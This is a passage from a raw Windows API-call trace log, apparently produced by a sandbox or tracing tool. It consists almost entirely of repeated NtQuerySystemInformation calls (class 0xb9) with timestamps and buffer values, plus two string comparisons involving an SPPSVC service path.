(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d6e0, Length=0x20, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.444] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.456] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 